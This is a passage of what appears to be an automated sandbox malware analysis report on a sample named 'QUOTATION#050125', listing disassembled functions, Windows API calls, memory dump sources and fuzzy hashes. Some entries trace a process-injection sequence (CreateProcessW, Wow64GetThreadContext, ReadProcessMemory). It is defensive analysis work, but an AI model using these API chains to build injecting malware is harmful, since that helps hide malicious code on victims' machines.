                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseErrorHandleLast
                                                                                      • String ID:
                                                                                      • API String ID: 918212764-0
                                                                                      • Opcode ID: a28971cf563fc162dbc94362d74cb1ba01aff939504861363a9b69eadb4b444d
                                                                                      • Instruction ID: d7169c14a8ec4a80ba0a944bd0e38212085f0bfae8e6ab91dc2ad744c60cd834
                                                                                      • Opcode Fuzzy Hash: a28971cf563fc162dbc94362d74cb1ba01aff939504861363a9b69eadb4b444d
                                                                                      • Instruction Fuzzy Hash: 2E014C336047285AC2A062346C497FE37C54B82779F254119EB04DB9D3DE60CD81A390
                                                                                      Function 00E1936D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 00E19B2B
                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E19BC1
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E19BE3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 2438371351-0
                                                                                      • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                      • Instruction ID: 5e09410b8e6e4c5872730ffeb9e73f7d04d06011bbe8f496df50c5b37d3e36df
                                                                                      • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                      • Instruction Fuzzy Hash: AE12C024E14658C6EB24DF64D8507DEB272EF68300F10A0E9910DEB7A5E77A4FC1CB5A
                                                                                      Function 0014709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString
                                                                                      • String ID:
                                                                                      • API String ID: 2948472770-0
                                                                                      • Opcode ID: ed9275c49885fddcf7d2104b0a29855acde3aa256a50135613a8da079ca06b58
                                                                                      • Instruction ID: d948c2242c8ae3d94ff2e53265c1a6565351b4751151feb50c269dec96effe99
                                                                                      • Opcode Fuzzy Hash: ed9275c49885fddcf7d2104b0a29855acde3aa256a50135613a8da079ca06b58
                                                                                      • Instruction Fuzzy Hash: 46D13B75A04209EFCB14DF98D881DEDBBB5FF48314F15415AE915AB3A2DB30AE81CB90
                                                                                      Function 000DFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                      • Instruction ID: 4f479efec71328087c646c863aee5cfc37b03c68b479304e734d2a7594571fe9
                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                      • Instruction Fuzzy Hash: 6431F574A0020ADBC768CF59D580969F7A2FF49304B24D6A6E80ACB755D731EDD1CBE0
                                                                                      Function 000C4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000C4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000C4EDD,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4E9C
                                                                                        • Part of subcall function 000C4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000C4EAE
                                                                                        • Part of subcall function 000C4E90: FreeLibrary.KERNEL32(00000000,?,?,000C4EDD,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4EC0
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4EFD
                                                                                        • Part of subcall function 000C4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00103CDE,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4E62
                                                                                        • Part of subcall function 000C4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000C4E74
                                                                                        • Part of subcall function 000C4E59: FreeLibrary.KERNEL32(00000000,?,?,00103CDE,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4E87
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 2632591731-0
                                                                                      • Opcode ID: c64c41c966566ad2551665c1671b301869ca6e63b9c072a77b934046f1b3675d
                                                                                      • Instruction ID: 82070dd278fd2c6fec7ff5b1fd63f1653bbd557ffe39849652b8979407b5d51b
                                                                                      • Opcode Fuzzy Hash: c64c41c966566ad2551665c1671b301869ca6e63b9c072a77b934046f1b3675d
                                                                                      • Instruction Fuzzy Hash: D511E332610305AADB24FF60DC22FED77A5AF50711F20842EF552AA1D2EFB1AA459790
                                                                                      Function 000F4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,000C1129,00000000,?,000F2E29,00000001,00000364,?,?,?,000EF2DE,000F3863,00191444,?,000DFDF5,?), ref: 000F4CBE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: a3571135a1dd7114326b77d20622eaf5a8b80f74dd9b12620206994daa30f7b5
                                                                                      • Instruction ID: 5ab14480cdc7a3ee8c19fb5a5a7ece19f40ab6e6c73c5a50b06646613d6a9d79
                                                                                      • Opcode Fuzzy Hash: a3571135a1dd7114326b77d20622eaf5a8b80f74dd9b12620206994daa30f7b5
                                                                                      • Instruction Fuzzy Hash: 6FF0BB3150226C6ADBA15F629C05B7B37D8BF41761B145125BF19A7A81CA30D80065D0
                                                                                      Function 000F3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00191444,?,000DFDF5,?,?,000CA976,00000010,00191440,000C13FC,?,000C13C6,?,000C1129), ref: 000F3852
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: dcbf13906800e252306d2841bf747753c0ac3232d4fe320570f822de82ff811f
                                                                                      • Instruction ID: 83955f0597e0c6aab9be7531c696f51e6a4da2896ce8deffb275a942b3965516
                                                                                      • Opcode Fuzzy Hash: dcbf13906800e252306d2841bf747753c0ac3232d4fe320570f822de82ff811f
                                                                                      • Instruction Fuzzy Hash: 5CE0E53110036DAAD6712A779D01BFA36C8AB42BF0F090021BE04A6E81DF19DE03A1E0
                                                                                      Function 000C4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,?,00191418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000C4F6D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      • Opcode ID: 40b4ded9df539fc131fac9c3a57e49c25021a966966fcb8cbda6cf08cbdf73d1
                                                                                      • Instruction ID: 9fe2efde7b695aad62b140791c359ee0754f92812b66b0fa0f9f41747cccc1f0
                                                                                      • Opcode Fuzzy Hash: 40b4ded9df539fc131fac9c3a57e49c25021a966966fcb8cbda6cf08cbdf73d1
                                                                                      • Instruction Fuzzy Hash: 5EF03971105752CFDB349F64D4A0E6ABBE4BF14329320897EE1EA82621CB319885DF50
                                                                                      Function 0012CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0010EE51,00183630,00000002), ref: 0012CD26
                                                                                        • Part of subcall function 0012CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0012CD19,?,?,?), ref: 0012CC59
                                                                                        • Part of subcall function 0012CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0012CD19,?,?,?,?,0010EE51,00183630,00000002), ref: 0012CC6E
                                                                                        • Part of subcall function 0012CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0012CD19,?,?,?,?,0010EE51,00183630,00000002), ref: 0012CC7A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$Write
                                                                                      • String ID:
                                                                                      • API String ID: 3847668363-0
                                                                                      • Opcode ID: c6e72140444c62416d439f70abcbc52c3165b01c55c944311ac3bcb7e9df70e4
                                                                                      • Instruction ID: b52f6716d86dd1546455406fff25c1f11cb91fe731a160b74e6ad457725360c3
                                                                                      • Opcode Fuzzy Hash: c6e72140444c62416d439f70abcbc52c3165b01c55c944311ac3bcb7e9df70e4
                                                                                      • Instruction Fuzzy Hash: D3E06576400714EFC7219F86ED4089ABBF8FFC4351710852FE955C2510D3B1AA54DFA0
                                                                                      Function 000C2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000C2DC4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongNamePath
                                                                                      • String ID:
                                                                                      • API String ID: 82841172-0
                                                                                      • Opcode ID: 02d332c0da421b48bf0fb589910e83e5456f9ad59d0677da3677dd8a1573942f
                                                                                      • Instruction ID: 8eeb0c6cbfad30ec64d43f42d9a94b49a7cbd55a8abe81d4788ed978a1c7198f
                                                                                      • Opcode Fuzzy Hash: 02d332c0da421b48bf0fb589910e83e5456f9ad59d0677da3677dd8a1573942f
                                                                                      • Instruction Fuzzy Hash: 37E0C272A002246BCB20E7989C06FEA77EDDFC8790F0400B5FD09E7248DAA4ADC48690
                                                                                      Function 000C2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000C3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C3908
                                                                                        • Part of subcall function 000CD730: GetInputState.USER32 ref: 000CD807
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000C2B6B
                                                                                        • Part of subcall function 000C30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 000C314E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                      • String ID:
                                                                                      • API String ID: 3667716007-0
                                                                                      • Opcode ID: 582133e8222730336f130ac35b3ed141bcfeab9c211d898b2a3ad3f580d01e1e
                                                                                      • Instruction ID: be1fc837e0f7f3d01c25b24c65a8b706fe8941f4676c93dc0b1eb71c3887bf43
                                                                                      • Opcode Fuzzy Hash: 582133e8222730336f130ac35b3ed141bcfeab9c211d898b2a3ad3f580d01e1e
                                                                                      • Instruction Fuzzy Hash: 26E0862230434516CA04BB74A856FFDB7599BD5351F40553EF142471A3DF2489CA4251
                                                                                      Function 0010039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00100704,?,?,00000000,?,00100704,00000000,0000000C), ref: 001003B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: b361be10b0e00002bae87d68e464da797d7746894510e8ec70cf6ac496f1c008
                                                                                      • Instruction ID: 2e89f02ddee3c7705cc33bc6bc8e645745fc4774387fc3c987b322dc5e6a8ec4
                                                                                      • Opcode Fuzzy Hash: b361be10b0e00002bae87d68e464da797d7746894510e8ec70cf6ac496f1c008
                                                                                      • Instruction Fuzzy Hash: 8CD06C3204020DFFDF029F84DD46EDA3BAAFB48714F014000BE185A020C732E861AB90
                                                                                      Function 000C1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 000C1CBC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoParametersSystem
                                                                                      • String ID:
                                                                                      • API String ID: 3098949447-0
                                                                                      • Opcode ID: b09a23bbbe24cd81e790c24804f3d509a3bf5a94f209aa1b9b9955293ddc6caa
                                                                                      • Instruction ID: 6786e4fb22ba81df57cf4a6fd9f2fd0cfbc65183e2e0fd3c039f356b7d2295b6
                                                                                      • Opcode Fuzzy Hash: b09a23bbbe24cd81e790c24804f3d509a3bf5a94f209aa1b9b9955293ddc6caa
                                                                                      • Instruction Fuzzy Hash: 6EC0483A380306AEF2148B90AC4AF507764A348B11F448002F619A99E392B228A0EA90
                                                                                      Function 0013744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000C5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,000C949C,?,00008000), ref: 000C5773
                                                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 001376DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 1214770103-0
                                                                                      • Opcode ID: 58d88b0e807b8675712fff92146361db68c346f35c198477d5ade690b6382a0d
                                                                                      • Instruction ID: fa1617b39d0df1a0ff60d053e347c415da289ee41f4ef6ad5260147461743dd4
                                                                                      • Opcode Fuzzy Hash: 58d88b0e807b8675712fff92146361db68c346f35c198477d5ade690b6382a0d
                                                                                      • Instruction Fuzzy Hash: 84816F706087019FD724EF28C4A2BADB7E1AF89314F04455DF89A5B3E2DB30AD45CB92
                                                                                      Function 000C6246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?,?,00000000,001024E0), ref: 000C6266
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: cda6c1e36f29b2eb5979c1f77efea337f56944c90d238c207eb21c56970ba953
                                                                                      • Instruction ID: 2988e059855fd594bad030485a52c40cb4ad273dce196a9402d0ddb8543ca43a
                                                                                      • Opcode Fuzzy Hash: cda6c1e36f29b2eb5979c1f77efea337f56944c90d238c207eb21c56970ba953
                                                                                      • Instruction Fuzzy Hash: 52E0B675400B01CFC3714F1AE804916FBF5FFE13613204A2ED0E792660D3B158868F50
                                                                                      Function 00E1A370 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000001F4), ref: 00E1A381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                      • Instruction ID: 241f3164a663e98a5f483df66b5b4a3a17259c3e83a6a4b2f4d1f227d570f50e
                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                      • Instruction Fuzzy Hash: 36E0E67494120DDFDB00EFB4D5496EE7FB4EF04301F100161FD05E2280D6309D508A62

                                                                                      Non-executed Functions

                                                                                      Function 00159576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0015961A
                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0015965B
                                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0015969F
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001596C9
                                                                                      • SendMessageW.USER32 ref: 001596F2
                                                                                      • GetKeyState.USER32(00000011), ref: 0015978B
                                                                                      • GetKeyState.USER32(00000009), ref: 00159798
                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001597AE
                                                                                      • GetKeyState.USER32(00000010), ref: 001597B8
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001597E9
                                                                                      • SendMessageW.USER32 ref: 00159810
                                                                                      • SendMessageW.USER32(?,00001030,?,00157E95), ref: 00159918
                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0015992E
                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00159941
